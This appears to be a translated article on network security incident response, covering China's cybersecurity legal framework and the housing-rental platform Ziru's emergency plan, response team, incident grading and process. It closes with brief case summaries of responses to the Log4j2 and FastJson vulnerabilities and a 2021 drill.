Why Network Security Incident Response Matters: Strategies, Plans, and Real‑World Cases

1. Overall Situation of Network Security

At the start of 2020, the COVID‑19 pandemic triggered a surge of APT attacks using the outbreak as bait. While the internet supported epidemic control, it also highlighted the widespread use of cloud computing, big data, IoT, 5G, and AI, and the growing threats of attacks, vulnerabilities, data leaks, scams, and ransomware.

2. High-Level Government Attention

Since the 18th Party Congress, President Xi Jinping has emphasized network security and informationization, forming the "Cyber‑Power" strategic thought that has driven significant progress in China’s cyber‑information sector.

3. Governing Network Security by Law

On June 1, 2017, China enacted the Cybersecurity Law, establishing a foundational legal framework. In 2022, additional laws such as the Data Security Law, Personal Information Protection Law, and various regulations created a comprehensive "four‑beam, eight‑pillar" structure for national cyberspace security.

4. Why Conduct Network Security Incident Response?

Incident response (or emergency response) refers to the preparations and actions an organization takes before and after unexpected security events to minimize damage.

Two main activities are involved:

Pre‑event preparation: risk assessment, security planning, awareness training, early warnings, and preventive measures.

Post‑event mitigation: system backup, virus detection, backdoor removal, isolation, recovery, investigation, and forensic analysis.

These phases complement each other; proper planning guides effective response, and post‑event lessons improve future plans.

5. What Is Incident Response and Its Core Activities?

Most security incidents can be prevented or mitigated through feasible emergency plans, reducing economic, reputational, and even life‑threatening impacts.

The national emergency plan issued on June 27, 2017, defines network security incidents (e.g., malicious code, attacks, data breaches, infrastructure failures) and mandates a coordinated response mechanism.

6. Ziru’s Network Security Incident Response Construction

Ziru, a leading housing‑rental platform, complies with the Cybersecurity Law by implementing a graded protection system and establishing a comprehensive emergency response framework.

6.1 Developing an Emergency Plan

The company drafted the "Ziru Network Security Incident Emergency Plan" in 2018, revised in 2019, covering plan activation conditions, organizational structure, resource guarantees, training, and regular reviews, as required by the law.

6.2 Forming an Emergency Leadership Team

The team is led by the CTO and includes heads of Information Security, Operations, Customer Service, Risk Control, Public‑Safety Business, and Brand/Public Relations.

6.3 Classifying and Grading Incidents

Incidents are categorized (e.g., malicious program, attack, data loss) and graded into three levels: major (Level I), significant (Level II), and general (Level III) based on impact.

6.4 Three Stages of a Security Incident

Preparation → Detection & Containment → Recovery & Post‑mortem.

6.5 Incident Response Process

A detailed flowchart (illustrated in the image) guides steps from alert to resolution.

7. Case Studies

7.1 Apache Log4j2 Remote Code Execution Vulnerability

Response actions included rapid vulnerability assessment, patch deployment, and system monitoring.

7.2 2021 Network Security Emergency Drill

The drill simulated a large‑scale attack to test the emergency plan and team coordination.

7.3 FastJson Deserialization Vulnerability

Ziru executed an emergency response to mitigate the risk of arbitrary code execution.